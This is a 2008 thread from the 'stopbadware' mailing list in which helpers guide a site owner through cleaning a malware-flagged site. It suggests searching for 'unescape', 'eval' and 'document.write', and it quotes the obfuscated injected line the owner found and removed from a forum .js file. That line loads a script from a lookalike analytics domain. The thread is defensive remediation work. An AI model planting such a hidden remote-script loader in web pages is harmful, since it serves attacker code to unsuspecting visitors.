Steve,
That could very well be it. It seems from the google pages, that the
occurence of the problem isn't happening very often. So it would
probably be just one or two of this kind of entries that you should be
looking for.
In more rare cases, the problem can even be further obscured by
algorithms that will only show this to certain places in the world, in
which case it becomes very hard to identify.
Kent
On Oct 2, 5:22 pm, "Steve Thompson" <[EMAIL PROTECTED]> wrote:
> Denis -
> Thank you so much for taking the time to look through the URLs and provide
> assistance. I did a grep looking for 'document.write, unescape, and eval'
> and found 1 link that was bad. It was buried in some .js on a forum include
> file:
>
> httpdocs/forums/clientscript/vbulletin_md5.js:document.writeln("document.write(unescape(\"%3Cscript%20type%3D%22text\/javascript%22%20src%3D%22http%3A\/\/www.google-analytices.com\/ga.js%22%3E%3C\/script%3E\"))");
>
> I removed it. It appeared the file had write permissions on the server, so
> I changed that, too.
>
> This appears to be a different domain listed on my diagnostic page, but it
> is VERY similar, so I'm thinking this could've been the culprit...
> especially since I couldn't find anything else using GREP or searching the
> DB.
>
> Do you think this was it? Again, I thank you!
> steve
>
>
>
>
>
> On Thu, Oct 2, 2008 at 4:52 AM, UseShots <[EMAIL PROTECTED]> wrote:
>
> > Hi Steve,
>
> > I couldn't find anything suspicious on the mentioned web pages. By
> > the way, the last page requires a login so I wonder how Google checked
> > that page.
>
> > Sometimes the plain search is now enough. Malicious scripts are
> > usually obfuscated, so you won't see the domain names in plain text.
> > You can try to search for scripts with words "unescape", "eval",
> > "document.write". The search will return quite a few legitimate
> > scripts but may also help you find "malicious" scripts if they are
> > there.
>
> > Another concern is user submitted content. Do you allow to insert
> > Flash ojects from other sites in forum posts? Without latest security
> > updates, some flash files can be harmful. The same may apply to some
> > other types of user submitted content.
>
> > P.S. I don't think AdSense is to blame.
>
> > Denis
> >http://UnmaskParasites.com
>
> --
>
> :::steve thompson:::http://www.stevejthompson.com- Hide quoted text -
>
> - Show quoted text -
--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---
